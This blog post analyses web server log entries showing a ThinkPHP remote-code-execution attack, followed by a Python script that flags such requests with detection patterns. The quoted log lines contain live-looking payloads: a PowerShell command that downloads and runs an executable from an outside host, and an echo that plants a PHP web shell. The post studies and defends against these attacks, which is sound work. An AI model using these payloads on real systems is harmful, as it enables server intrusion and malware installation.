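Tuesday, June 18, 2019

Learning System Vulnerabilities from Web Logs 43

Similar to the earlier ones, just with a slight variation: the same technique of downloading an executable and then running it automatically. I don't understand the point of the first and third attacks (using different PHP files?). This one comes from someone in Portugal.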

87.103.14.199 - - [17/Jun/2019:23:22:01 +0800] "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe');start%20%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "http://www.w-studio.idv.tw/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe');start %SystemRoot%/Temp/xfxrucjwcznptjk12592.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

87.103.14.199 - - [17/Jun/2019:23:22:01 +0800] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 214 "http://www.w-studio.idv.tw/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

87.103.14.199 - - [17/Jun/2019:23:22:02 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe');start%20%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "http://www.w-studio.idv.tw/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe');start %SystemRoot%/Temp/xfxrucjwcznptjk12592.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
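A triage sketch for entries like the three above, added here as an example and not part of the original post: it URL-decodes each request, tags the patterns visible in these log lines, and links a request for a `.php` file to an earlier request that tried to create a file of that name with `echo ... >>`. It assumes Apache combined log format; the rule names and regular expressions are this example's own, and the sample lines are constructed from the entries above with a placeholder IP and download host.

```python
import re
from urllib.parse import unquote

# Combined Log Format: client IP, timestamp, request line, status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) \S+')

# Rule name -> pattern applied to the URL-decoded request target
RULES = {
    "thinkphp_invokefunction": re.compile(r"think\\+app/invokefunction.*call_user_func_array", re.I),
    "powershell_download": re.compile(r"powershell.*webclient\)?\.downloadfile", re.I),
    "php_file_written_by_echo": re.compile(r"echo\s.*<\?php.*>>?\s*(\S+\.php)", re.I),
    "os_command_in_query": re.compile(r"[?&][^=&]+=cmd\.exe\b", re.I),
}

# Constructed sample: shortened copies of the entries above, placeholder IP and host
SAMPLE = r'''
203.0.113.5 - - [17/Jun/2019:23:22:01 +0800] "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://example.invalid/a.exe','%SystemRoot%/Temp/a.exe') HTTP/1.1" 404 214 "-" "Mozilla/4.0"
203.0.113.5 - - [17/Jun/2019:23:22:01 +0800] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 214 "-" "Mozilla/4.0"
203.0.113.5 - - [17/Jun/2019:23:22:02 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://example.invalid/a.exe','%SystemRoot%/Temp/a.exe') HTTP/1.1" 404 214 "-" "Mozilla/4.0"
203.0.113.5 - - [17/Jun/2019:23:25:10 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''

def triage(lines):
    """Return one finding per suspicious request, in log order."""
    findings, dropped = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote(m["target"])  # invalid escapes such as %Sy are left as-is
        hits = [name for name, rx in RULES.items() if rx.search(target)]
        # Remember file names that an echo-redirect request tried to create ...
        w = RULES["php_file_written_by_echo"].search(target)
        if w:
            dropped.add(w.group(1).lower())
        # ... and flag later direct requests for a file of the same name.
        path = target.split("?", 1)[0]
        if path.rsplit("/", 1)[-1].lower() in dropped:
            hits.append("request_to_dropped_file")
        if hits:
            findings.append({"ip": m["ip"], "status": int(m["status"]), "path": path,
                             "rules": hits, "served": m["status"].startswith("2")})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE.splitlines()):
        print(f)
```

All three findings carry status 404 and `served: False`, as in the log above; a 2xx on any of them is the case to investigate first.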
